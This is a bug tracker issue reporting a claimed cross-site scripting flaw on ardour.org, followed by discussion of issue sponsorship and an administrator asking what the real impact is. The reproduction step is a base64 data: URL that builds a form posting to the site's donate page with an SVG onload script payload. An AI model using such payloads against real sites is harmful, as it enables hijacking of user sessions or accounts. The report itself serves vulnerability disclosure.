View Issue Details

IDCategoryLast Update
0007660bugs2018-10-25 18:56
Reporternaveed78945124Assigned To 
Reproducibilityalways 
Status newResolutionopen 
PlatformkaliOSkali linuxOS Versionkali 2.0
Product Version5.12 
Fixed in Version 
Summary0007660: xss vulnerability
Descriptioni have found xss vulnerability your site.
i have past url to reproduce
past the link web browese
click the xss
Steps To Reproducedata:Text/Html;Base64,PGZvcm0gYWN0aW9uPWh0dHA6Ly9jb21tdW5pdHkuYXJkb3VyLm9yZy9kb25hdGUyIG1ldGhvZD0iUE9TVCI+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ImN1cnJlbmN5IiB2YWx1ZT0iVVNEIj48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0iY3VycmVuY3kiIHZhbHVlPSImcXVvdDstLSEmZ3Q7Jmx0O1N2Zy9PbkxvYWQ9KGNvbmZpcm0pKDEpJmd0OyZxdW90OyI+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ImFtb3VudCIgdmFsdWU9IjI1Ij48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0ic3VibWl0IiB2YWx1ZT0iIj48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0iIiB2YWx1ZT0iIj48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9WFNTPjwvZm9ybT4=
Additional Informationhttps://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
TagsNo tags attached.

Users sponsoring this issue
Sponsors List Total Sponsorship = US$ 250

2018-09-05 21:21: naveed78945124 (US$ 250)
Users sponsoring this issue (Total Sponsorship = US$ 250)

Activities

naveed78945124

2018-09-05 21:12

reporter  

Capture2.PNG (88,813 bytes)
Capture2.PNG (88,813 bytes)

naveed78945124

2018-09-05 21:24

reporter   ~0020378

i dont know what is the meaning Users sponsoring this issue ?

timbyr

2018-09-08 01:32

developer   ~0020380

Sponsoring an issue is an indication of how much someone is willing to pay to see an issue fixed or functionality completed. It is an honesty system and is non-binding.

naveed78945124

2018-09-13 15:15

reporter   ~0020384

when i got sponsoring money ????

Headwar

2018-09-21 09:30

reporter   ~0020391

Sponsoring is how much you are willing to pay for the issue to be fixed, not how much you will earn from reporting it.

x42

2018-10-25 18:56

administrator   ~0020418

What is the actual issue here?

Craft a dedicated link that makes a user believe he's going to donate to ardour.org. Make a user click on that link somehow, then gain access to the user's account at ardour.org or some other browser-tab information?

Issue History

Date Modified Username Field Change
2018-09-05 21:12 naveed78945124 New Issue
2018-09-05 21:12 naveed78945124 File Added: Capture2.PNG
2018-09-05 21:21 naveed78945124 Sponsorship Added naveed78945124: US$ 10000
2018-09-05 21:21 naveed78945124 Sponsorship Total 0 => 10000
2018-09-05 21:24 naveed78945124 Note Added: 0020378
2018-09-08 01:32 timbyr Note Added: 0020380
2018-09-11 11:15 naveed78945124 Sponsorship Updated naveed78945124: US$ 250
2018-09-11 11:15 naveed78945124 Sponsorship Total 10000 => 250
2018-09-13 15:15 naveed78945124 Note Added: 0020384
2018-09-21 09:30 Headwar Note Added: 0020391
2018-10-25 18:56 x42 Note Added: 0020418